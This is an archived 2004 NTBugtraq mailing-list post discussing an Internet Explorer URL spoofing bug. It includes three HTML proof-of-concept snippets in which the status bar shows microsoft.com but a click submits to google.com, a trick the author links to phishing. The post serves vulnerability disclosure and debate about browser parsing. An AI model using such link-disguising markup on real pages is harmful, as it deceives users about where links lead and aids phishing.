Re: New URL spoofing bug in Microsoft Internet Explorer
From: Russ (Russ.Cooper_at_RC.ON.CA)
Date: 11/01/04
- Next in thread: Martin Maher: "Re: New URL spoofing bug in Microsoft Internet Explorer"
- Maybe reply: Martin Maher: "Re: New URL spoofing bug in Microsoft Internet Explorer"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 1 Nov 2004 13:08:05 -0500 To: NTBUGTRAQ@listserv.ntbugtraq.com
Well, code that is improperly formed may well cause user agents to try and figure out for themselves what they should do. Code that isn't permitted, however, should IMO be handled differently.
For example, an A Element implicitly denies the inclusion of a Button or Form Element, and a Button Element explicitly denies the inclusion of an A Element.
The following examples all work, regardless where you put your mouse. They all show microsoft.com in the status bar, but when the text is click they all go to google.com. I contend they shouldn't. The fact that the A Element is being allowed to function is what makes any/all of these potentially harmful. If stricter interpretation rules applied to the A Element, a great deal of phishing might be avoided. Ken Grohs feels this is all a moot point, he points out that you can do this by using onmouseover and onmouseout. I agree, but he has to use script.
IMO, A Elements should be perfectly formed or not work as links, display in the status bar, or render as links do (e.g. visited link color, etc...)
Credit to http-equiv for making the button disappear.
<form action="http://www.google.com" method="get">
<a href="http://www.microsoft.com/">
<button title="http://www.microsoft.com" type=submit style="BORDER: 0pt; CURSOR: hand; COLOR: blue; BACKGROUND-COLOR: transparent; ">
http://www.microsoft.com
</button>
</a>
</form>
<form action="http://www.google.com" method="get">
<a href="http://www.microsoft.com/">
<button title="http://www.microsoft.com" type=submit style="BORDER: 0pt; CURSOR: hand; COLOR: blue; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline">
<a href="http://www.microsoft.com/">
http://www.microsoft.com
</a>
</button>
</a>
</form>
<a href="http://www.microsoft.com/">
<form action="http://www.google.com" method="get">
<button title="http://www.microsoft.com" type=submit style="BORDER: 0pt; CURSOR: hand; COLOR: blue; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline">
http://www.microsoft.com
</button>
</form>
</a>
Cheers,
Russ - NTBugtraq Editor
-- NTBugtraq Editor's Note: Want to reply to the person who sent this message? This list is configured such that just hitting reply is going to result in the message coming to the list, not to the individual who sent the message. This was done to help reduce the number of Out of Office messages posters received. So if you want to send a reply just to the poster, you'll have to copy their email address out of the message and place it in your TO: field. --
- Next in thread: Martin Maher: "Re: New URL spoofing bug in Microsoft Internet Explorer"
- Maybe reply: Martin Maher: "Re: New URL spoofing bug in Microsoft Internet Explorer"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
